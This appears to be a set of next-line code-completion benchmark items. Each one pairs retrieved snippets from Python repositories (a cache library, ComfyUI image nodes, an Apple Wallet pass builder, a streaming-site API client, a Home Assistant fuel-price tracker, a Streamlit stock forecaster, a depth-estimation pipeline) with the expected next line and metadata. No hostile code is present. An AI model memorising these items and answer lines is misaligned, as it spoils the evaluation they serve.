"snippet": "class MemoryCache:\n def __init__(self) -> None:\n self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {}\n\n def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None:\n self._cache[name] = value, ex and time.time() + ex\n\n def get(self, name: str, default: Any = None) -> Any:\n val, exp_at = self._cache.get(name, (default, None))\n\n if not exp_at or exp_at > time.time():\n return val\n\n self.delete(name)\n return default\n\n def delete(self, *names: str) -> None:\n for key in names:\n if key not in self._cache:\n continue\n\n del self._cache[key]"
},
{
"identifier": "CachifyInitError",
"path": "py_cachify/backend/exceptions.py",
"snippet": "class CachifyInitError(Exception):\n pass"
},
{
"identifier": "AsyncClient",
"path": "py_cachify/backend/types.py",
"snippet": "class AsyncClient(Protocol):\n async def get(self, name: str, default: Any = None) -> Any:\n raise NotImplementedError\n\n async def delete(self, *names: str) -> Any:\n raise NotImplementedError\n\n async def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:\n raise NotImplementedError"
},
{
"identifier": "SyncClient",
"path": "py_cachify/backend/types.py",
"snippet": "class SyncClient(Protocol):\n def get(self, name: str, default: Any = None) -> Any:\n raise NotImplementedError\n\n def delete(self, *names: str) -> Any:\n raise NotImplementedError\n\n def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:\n raise NotImplementedError"
}
] | import pickle
from typing import Any, Union
from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.types import AsyncClient, SyncClient | 664 | from __future__ import annotations
class Cachify:
def __init__(
| from __future__ import annotations
class Cachify:
def __init__( | self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str | 1 | 2023-12-16 22:54:51+00:00 | 2k |
lldacing/comfyui-easyapi-nodes | easyapi/ImageNode.py | [
{
"identifier": "tensor_to_pil",
"path": "easyapi/util.py",
"snippet": "def tensor_to_pil(image):\n return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))"
},
{
"identifier": "pil_to_tensor",
"path": "easyapi/util.py",
"snippet": "def pil_to_tensor(image):\n return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0)"
},
{
"identifier": "base64_to_image",
"path": "easyapi/util.py",
"snippet": "def base64_to_image(base64_string):\n # 去除前缀\n base64_list = base64_string.split(\",\", 1)\n if len(base64_list) == 2:\n prefix, base64_data = base64_list\n else:\n base64_data = base64_list[0]\n\n # 从base64字符串中解码图像数据\n image_data = base64.b64decode(base64_data)\n\n # 创建一个内存流对象\n image_stream = io.BytesIO(image_data)\n\n # 使用PIL的Image模块打开图像数据\n image = Image.open(image_stream)\n\n return image"
},
{
"identifier": "image_to_base64",
"path": "easyapi/util.py",
"snippet": "def image_to_base64(pli_image, pnginfo=None):\n # 创建一个BytesIO对象,用于临时存储图像数据\n image_data = io.BytesIO()\n\n # 将图像保存到BytesIO对象中,格式为PNG\n pli_image.save(image_data, format='PNG', pnginfo=pnginfo)\n\n # 将BytesIO对象的内容转换为字节串\n image_data_bytes = image_data.getvalue()\n\n # 将图像数据编码为Base64字符串\n encoded_image = \"data:image/png;base64,\" + base64.b64encode(image_data_bytes).decode('utf-8')\n\n return encoded_image"
},
{
"identifier": "read_image_from_url",
"path": "easyapi/util.py",
"snippet": "def read_image_from_url(image_url):\n response = requests.get(image_url)\n img = Image.open(io.BytesIO(response.content))\n return img"
}
] | import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url
| 1,382 |
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
|
class LoadImageFromURL:
"""
从远程地址读取图片
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
RETURN_NAMES = ("images", "masks")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls):
urls = urls.splitlines()
images = []
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
i = ImageOps.exif_transpose(i)
image = i.convert("RGB")
image = pil_to_tensor(image)
images.append(image)
if 'A' in i.getbands():
mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
mask = 1. - torch.from_numpy(mask)
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (images, masks, )
class LoadMaskFromURL:
"""
从远程地址读取图片
"""
_color_channels = ["red", "green", "blue", "alpha"]
@classmethod
def INPUT_TYPES(self):
return {
"required": {
"urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
"channel": (self._color_channels, {"default": self._color_channels[0]}),
},
}
RETURN_TYPES = ("MASK", )
RETURN_NAMES = ("masks", )
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True,)
def convert(self, urls, channel=_color_channels[0]):
urls = urls.splitlines()
masks = []
for url in urls:
if not url.strip().isspace():
i = read_image_from_url(url.strip())
# 下面代码参考LoadImage
i = ImageOps.exif_transpose(i)
if i.getbands() != ("R", "G", "B", "A"):
i = i.convert("RGBA")
c = channel[0].upper()
if c in i.getbands():
mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
mask = torch.from_numpy(mask)
if c == 'A':
mask = 1. - mask
else:
mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
masks.append(mask)
return (masks,)
class Base64ToImage:
"""
图片的base64格式还原成图片的张量
"""
@classmethod
def INPUT_TYPES(self):
return {"required": {
"base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
},
}
RETURN_TYPES = ("IMAGE", "MASK")
# RETURN_NAMES = ("image", "mask")
FUNCTION = "convert"
CATEGORY = "EasyApi/Image"
# INPUT_IS_LIST = False
OUTPUT_IS_LIST = (True, True)
def convert(self, base64Images):
# print(base64Image)
base64ImageJson = JSONDecoder().decode(s=base64Images)
images = []
masks = []
for base64Image in base64ImageJson:
| i = base64_to_image(base64Image)
| 2 | 2023-12-19 02:32:10+00:00 | 2k |
bersegosx/passosh | src/passosh/pesso.py | [
{
"identifier": "HeaderField",
"path": "src/passosh/fields.py",
"snippet": "class HeaderField:\n \"\"\"\n An object that represents the fields that display information at the top of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''"
},
{
"identifier": "PrimaryField",
"path": "src/passosh/fields.py",
"snippet": "class PrimaryField:\n \"\"\"\n An object that represents the fields that display the most important information on a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n\n changeMessage: str = ''"
},
{
"identifier": "SecondaryField",
"path": "src/passosh/fields.py",
"snippet": "class SecondaryField:\n \"\"\"\n An object that represents the fields that display supporting information on the front of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''"
},
{
"identifier": "BackField",
"path": "src/passosh/fields.py",
"snippet": "class BackField:\n \"\"\"\n An object that represents the fields that display information on the back of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n\n textAlignment: str = TextAlignment.LEFT\n changeMessage: str = ''"
},
{
"identifier": "AuxiliaryField",
"path": "src/passosh/fields.py",
"snippet": "class AuxiliaryField:\n \"\"\"\n An object that represents the fields that display additional information on the front of a pass.\n \"\"\"\n key: str\n value: str\n label: str = ''\n textAlignment: str = TextAlignment.NATURAL\n\n changeMessage: str = ''\n row: int = 0"
},
{
"identifier": "Barcode",
"path": "src/passosh/fields.py",
"snippet": "class Barcode:\n message: str\n format: BarcodeFormat\n messageEncoding: str = 'iso-8859-1'\n\n altText: str = '' # isn’t displayed for watchOS"
},
{
"identifier": "BoardingPassTransitType",
"path": "src/passosh/fields.py",
"snippet": "class BoardingPassTransitType(str, Enum):\n GENERIC = 'PKTransitTypeGeneric'\n AIR = 'PKTransitTypeAir'\n BOAT = 'PKTransitTypeBoat'\n BUS = 'PKTransitTypeBus'\n TRAIN = 'PKTransitTypeTrain'"
},
{
"identifier": "Location",
"path": "src/passosh/fields.py",
"snippet": "class Location:\n \"\"\"\n An object that represents a location that the system uses to show a relevant pass.\n \"\"\"\n latitude: float # in degrees, of the location\n longitude: float # in degrees, of the location\n altitude: float | None = None # in meters, of the location\n\n # the text to display on the lock screen when the pass is relevant.\n # For example, a description of a nearby location, such as “Store nearby on 1st and Main”.\n relevantText: str | None = None"
}
] | from dataclasses import dataclass
from .fields import (HeaderField, PrimaryField, SecondaryField, BackField, AuxiliaryField, Barcode,
BoardingPassTransitType, Location) | 786 |
@dataclass
class Content:
"""
An object that represents the groups of fields that display the information for an event ticket.
"""
headerFields: list[HeaderField] | None = None
primaryFields: list[PrimaryField] | None = None
|
@dataclass
class Content:
"""
An object that represents the groups of fields that display the information for an event ticket.
"""
headerFields: list[HeaderField] | None = None
primaryFields: list[PrimaryField] | None = None | secondaryFields: list[SecondaryField] | None = None | 2 | 2023-12-18 22:51:38+00:00 | 2k |
jonghwanhyeon/python-chzzk | chzzk/chzzk.py | [
{
"identifier": "ChzzkClient",
"path": "chzzk/client.py",
"snippet": "class ChzzkClient(HTTPClient):\n BASE_URL = \"https://api.chzzk.naver.com/\"\n\n def __init__(self, credential: Optional[Credential] = None):\n super().__init__(credential)"
},
{
"identifier": "Credential",
"path": "chzzk/client.py",
"snippet": "class Credential:\n auth: str\n session: str\n\n def as_cookie(self) -> dict[str, str]:\n return {\n \"NID_AUT\": self.auth,\n \"NID_SES\": self.session,\n }"
},
{
"identifier": "GameClient",
"path": "chzzk/client.py",
"snippet": "class GameClient(HTTPClient):\n BASE_URL = \"https://comm-api.game.naver.com/nng_main/\"\n\n def __init__(self, credential: Optional[Credential] = None):\n super().__init__(credential)"
},
{
"identifier": "Channel",
"path": "chzzk/models.py",
"snippet": "class Channel(PartialChannel):\n channel_type: Optional[str] = None\n channel_description: str\n follower_count: int\n open_live: bool"
},
{
"identifier": "ChannelSearchRecord",
"path": "chzzk/models.py",
"snippet": "class ChannelSearchRecord(SearchRecord):\n channel: Channel"
},
{
"identifier": "LiveDetail",
"path": "chzzk/models.py",
"snippet": "class LiveDetail(Live):\n status: str\n close_date: Optional[Annotated[datetime, AfterValidator(to_kst)]] = None\n chat_active: bool\n chat_available_group: str\n paid_promotion: bool\n chat_available_condition: str\n min_follower_minute: int\n channel: PartialChannel\n live_polling_status: Json[LivePollingStatus] = Field(alias=\"livePollingStatusJson\")"
},
{
"identifier": "LiveSearchRecord",
"path": "chzzk/models.py",
"snippet": "class LiveSearchRecord(SearchRecord):\n live: Live\n channel: PartialChannel"
},
{
"identifier": "LiveStatus",
"path": "chzzk/models.py",
"snippet": "class LiveStatus(RawModel):\n live_title: str\n status: str\n concurrent_user_count: int\n accumulate_count: int\n paid_promotion: bool\n adult: bool\n chat_channel_id: str\n category_type: Optional[str] = None\n live_category: Optional[str] = None\n live_category_value: str\n live_polling_status: Json[LivePollingStatus] = Field(alias=\"livePollingStatusJson\")\n fault_status: Any"
},
{
"identifier": "SearchCursor",
"path": "chzzk/models.py",
"snippet": "class SearchCursor(RawModel, Generic[T]):\n size: int\n page: Optional[Page] = None\n data: list[T]"
},
{
"identifier": "User",
"path": "chzzk/models.py",
"snippet": "class User(RawModel):\n has_profile: bool\n user_id_hash: Optional[str] = None\n nickname: Optional[str] = None\n profile_image_url: Optional[str] = None\n penalties: Optional[list[Any]] = None\n official_noti_agree: bool\n official_noti_agree_updated_date: Optional[str] = None\n verified_mark: bool\n logged_in: bool"
},
{
"identifier": "Video",
"path": "chzzk/models.py",
"snippet": "class Video(PartialVideo):\n paid_promotion: bool\n in_key: str\n live_open_date: Annotated[datetime, AfterValidator(to_kst)]\n vod_status: str\n\n prev_video: Optional[PartialVideo] = None\n next_video: Optional[PartialVideo] = None"
},
{
"identifier": "VideoSearchRecord",
"path": "chzzk/models.py",
"snippet": "class VideoSearchRecord(SearchRecord):\n video: VideoMetadata\n channel: PartialChannel"
}
] | from typing import Optional
from chzzk.client import ChzzkClient, Credential, GameClient
from chzzk.models import (
Channel,
ChannelSearchRecord,
LiveDetail,
LiveSearchRecord,
LiveStatus,
SearchCursor,
User,
Video,
VideoSearchRecord,
) | 1,194 |
class ChzzkLive:
def __init__(self, client: ChzzkClient):
self._client = client
async def status(self, channel_id: str) -> LiveStatus:
response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status")
return LiveStatus(**response)
async def detail(self, channel_id: str) -> LiveDetail:
response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail")
return LiveDetail(**response)
class ChzzkSearch:
def __init__(self, client: ChzzkClient):
self._client = client
async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]:
response = await self._client.get(
"service/v1/search/channels",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[ChannelSearchRecord](**response)
async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]:
response = await self._client.get(
"service/v1/search/lives",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[LiveSearchRecord](**response)
|
class ChzzkLive:
def __init__(self, client: ChzzkClient):
self._client = client
async def status(self, channel_id: str) -> LiveStatus:
response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status")
return LiveStatus(**response)
async def detail(self, channel_id: str) -> LiveDetail:
response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail")
return LiveDetail(**response)
class ChzzkSearch:
def __init__(self, client: ChzzkClient):
self._client = client
async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]:
response = await self._client.get(
"service/v1/search/channels",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[ChannelSearchRecord](**response)
async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]:
response = await self._client.get(
"service/v1/search/lives",
params={
"keyword": keyword,
"size": size,
"offset": offset,
},
)
return SearchCursor[LiveSearchRecord](**response)
| async def videos(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[VideoSearchRecord]: | 11 | 2023-12-20 22:09:07+00:00 | 2k |
pantherale0/ha-fuelprices | custom_components/fuel_prices/device_tracker.py | [
{
"identifier": "CONF_AREAS",
"path": "custom_components/fuel_prices/const.py",
"snippet": "CONF_AREAS = \"areas\""
},
{
"identifier": "DOMAIN",
"path": "custom_components/fuel_prices/const.py",
"snippet": "DOMAIN = \"fuel_prices\""
},
{
"identifier": "FeulStationEntity",
"path": "custom_components/fuel_prices/entity.py",
"snippet": "class FeulStationEntity(CoordinatorEntity):\n \"\"\"Represents a fuel station.\"\"\"\n\n def __init__(\n self, coordinator: FuelPricesCoordinator, fuel_station_id, entity_id, source\n ) -> None:\n \"\"\"Initialize.\"\"\"\n super().__init__(coordinator)\n self.coordinator: FuelPricesCoordinator = coordinator\n self._fuel_station_id = fuel_station_id\n self._entity_id = entity_id\n self._fuel_station_source = str(source).lower()\n\n @property\n def _fuel_station(self):\n \"\"\"Return the fuel station.\"\"\"\n return self.coordinator.api.configured_sources[\n self._fuel_station_source\n ].location_cache[self._fuel_station_id]\n\n @property\n def unique_id(self) -> str | None:\n \"\"\"Return unique ID.\"\"\"\n return f\"fuelprices_{self._fuel_station_id}_{self._entity_id}\""
},
{
"identifier": "FuelPricesCoordinator",
"path": "custom_components/fuel_prices/coordinator.py",
"snippet": "class FuelPricesCoordinator(DataUpdateCoordinator):\n \"\"\"Fuel Prices data coordinator.\"\"\"\n\n def __init__(self, hass: HomeAssistant, api: FuelPrices, name: str) -> None:\n \"\"\"Init the coordinator.\"\"\"\n super().__init__(\n hass=hass,\n logger=_LOGGER,\n name=name,\n update_interval=timedelta(minutes=30),\n )\n self.api: FuelPrices = api\n\n async def _async_update_data(self):\n \"\"\"Fetch and update data from the API.\"\"\"\n try:\n async with async_timeout.timeout(240):\n return await self.api.update()\n except TimeoutError as err:\n _LOGGER.error(\"Timeout updating fuel price data: %s\", err)\n except TypeError as err:\n _LOGGER.error(\"Error updating fuel price data: %s\", err)\n except Exception as err:\n raise UpdateFailed(f\"Error communicating with API {err}\") from err"
}
] | import logging
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_RADIUS, CONF_NAME
from homeassistant.components.device_tracker.config_entry import (
BaseTrackerEntity,
SourceType,
ATTR_SOURCE_TYPE,
ATTR_LATITUDE,
ATTR_LONGITUDE,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from pyfuelprices.const import PROP_FUEL_LOCATION_SOURCE
from .const import CONF_AREAS, DOMAIN
from .entity import FeulStationEntity
from .coordinator import FuelPricesCoordinator | 695 | """Device tracker for fuel prices."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Integration platform creation."""
| """Device tracker for fuel prices."""
from __future__ import annotations
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Integration platform creation.""" | cooridinator: FuelPricesCoordinator = hass.data[DOMAIN][entry.entry_id] | 1 | 2023-12-19 20:54:21+00:00 | 2k |
abdellatif-laghjaj/stock-market-prediction | main.py | [
{
"identifier": "load_data",
"path": "services.py",
"snippet": "@st.cache_data\ndef load_data(ticker, start, end):\n \"\"\"\n Load historical stock price data from Yahoo Finance.\n\n Parameters:\n - ticker (str): Stock symbol (e.g., AAPL).\n - start (str): Start date in the format 'YYYY-MM-DD'.\n - end (str): End date in the format 'YYYY-MM-DD'.\n\n Returns:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n try:\n data = yf.download(ticker, start, end)\n data.reset_index(inplace=True)\n return data\n except Exception as e:\n st.error(f\"Error loading data for {ticker}: {str(e)}\")\n return None"
},
{
"identifier": "plot_data",
"path": "services.py",
"snippet": "def plot_data(data):\n \"\"\"\n Plot historical stock price data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name=\"stock_open\"))\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name=\"stock_close\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_multiple_data",
"path": "services.py",
"snippet": "def plot_multiple_data(data, stock_names):\n \"\"\"\n Plot forecasted stock prices for multiple stocks.\n\n Parameters:\n - data (list): List of DataFrames containing forecasted stock price data.\n - stock_names (list): List of stock names corresponding to the forecasted data.\n \"\"\"\n fig = go.Figure()\n for i, stock_data in enumerate(data):\n fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f\"yhat - {stock_names[i]}\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_volume",
"path": "services.py",
"snippet": "def plot_volume(data):\n \"\"\"\n Plot historical stock volume data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock volume data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name=\"stock_volume\"))\n fig.update_layout(title_text=\"Stock Volume Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
}
] | from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st | 1,104 |
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
|
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."): | data = load_data(selected_stock, start_date, end_date) | 0 | 2023-12-17 11:38:48+00:00 | 2k |
replicate/cog-marigold | src/model/marigold_pipeline.py | [
{
"identifier": "RGBEncoder",
"path": "src/model/rgb_encoder.py",
"snippet": "class RGBEncoder(nn.Module):\n \"\"\"\n The encoder of pretrained Stable Diffusion VAE\n \"\"\"\n \n def __init__(self, pretrained_path, subfolder=None) -> None:\n super().__init__()\n \n vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)\n logging.info(f\"pretrained AutoencoderKL loaded from: {pretrained_path}\")\n \n self.rgb_encoder = nn.Sequential(\n vae.encoder,\n vae.quant_conv,\n )\n \n def to(self, *args, **kwargs):\n self.rgb_encoder.to(*args, **kwargs) \n \n def forward(self, rgb_in):\n return self.encode(rgb_in)\n \n def encode(self, rgb_in):\n moments = self.rgb_encoder(rgb_in) # [B, 8, H/8, W/8]\n mean, logvar = torch.chunk(moments, 2, dim=1)\n rgb_latent = mean\n return rgb_latent"
},
{
"identifier": "StackedDepthAE",
"path": "src/model/stacked_depth_AE.py",
"snippet": "class StackedDepthAE(nn.Module):\n \"\"\"\n Tailored pretrained image VAE for depth map.\n Encode: Depth images are repeated into 3 channels.\n Decode: The average of 3 chennels are taken as output.\n \"\"\"\n\n def __init__(self, pretrained_path, subfolder=None) -> None:\n super().__init__()\n\n self.vae: AutoencoderKL = AutoencoderKL.from_pretrained(pretrained_path, subfolder=subfolder)\n logging.info(f\"pretrained AutoencoderKL loaded from: {pretrained_path}\")\n\n def forward(self, depth_in):\n depth_latent = self.encode(depth_in)\n depth_out = self.decode(depth_latent)\n return depth_out\n\n def to(self, *args, **kwargs):\n self.vae.to(*args, **kwargs)\n\n @staticmethod\n def _stack_depth_images(depth_in):\n if 4 == len(depth_in.shape):\n stacked = depth_in.repeat(1, 3, 1, 1)\n elif 3 == len(depth_in.shape):\n stacked = depth_in.unsqueeze(1)\n stacked = depth_in.repeat(1, 3, 1, 1)\n return stacked\n\n def encode(self, depth_in):\n stacked = self._stack_depth_images(depth_in)\n h = self.vae.encoder(stacked)\n moments = self.vae.quant_conv(h)\n mean, logvar = torch.chunk(moments, 2, dim=1)\n depth_latent = mean\n return depth_latent\n\n def decode(self, depth_latent):\n z = self.vae.post_quant_conv(depth_latent)\n stacked = self.vae.decoder(z)\n depth_mean = stacked.mean(dim=1, keepdim=True)\n return depth_mean"
}
] | import logging
import numpy as np
import torch
from typing import Dict
from diffusers import (
DDIMScheduler,
DDPMScheduler,
PNDMScheduler,
SchedulerMixin,
UNet2DConditionModel,
)
from torch import nn
from torch.nn import Conv2d
from torch.nn.parameter import Parameter
from tqdm.auto import tqdm
from transformers import CLIPTextModel, CLIPTokenizer
from .rgb_encoder import RGBEncoder
from .stacked_depth_AE import StackedDepthAE | 1,288 | # Author: Bingxin Ke
# Last modified: 2023-12-11
class MarigoldPipeline(nn.Module):
"""
Marigold monocular depth estimator.
"""
def __init__(
self,
unet_pretrained_path: Dict, # {path: xxx, subfolder: xxx}
rgb_encoder_pretrained_path: Dict,
depht_ae_pretrained_path: Dict,
noise_scheduler_pretrained_path: Dict,
tokenizer_pretrained_path: Dict,
text_encoder_pretrained_path: Dict,
empty_text_embed=None,
trainable_unet=False,
rgb_latent_scale_factor=0.18215,
depth_latent_scale_factor=0.18215,
noise_scheduler_type="DDIMScheduler",
enable_gradient_checkpointing=False,
enable_xformers=True,
) -> None:
super().__init__()
self.rgb_latent_scale_factor = rgb_latent_scale_factor
self.depth_latent_scale_factor = depth_latent_scale_factor
self.device = "cpu"
# ******* Initialize modules *******
# Trainable modules
self.trainable_module_dic: Dict[str, nn.Module] = {}
self.trainable_unet = trainable_unet
# Denoising UNet
self.unet: UNet2DConditionModel = UNet2DConditionModel.from_pretrained(
unet_pretrained_path["path"], subfolder=unet_pretrained_path["subfolder"]
)
logging.info(f"pretrained UNet loaded from: {unet_pretrained_path}")
if 8 != self.unet.config["in_channels"]:
self._replace_unet_conv_in()
logging.warning("Unet conv_in layer is replaced")
if enable_xformers:
self.unet.enable_xformers_memory_efficient_attention()
else:
self.unet.disable_xformers_memory_efficient_attention()
# Image encoder
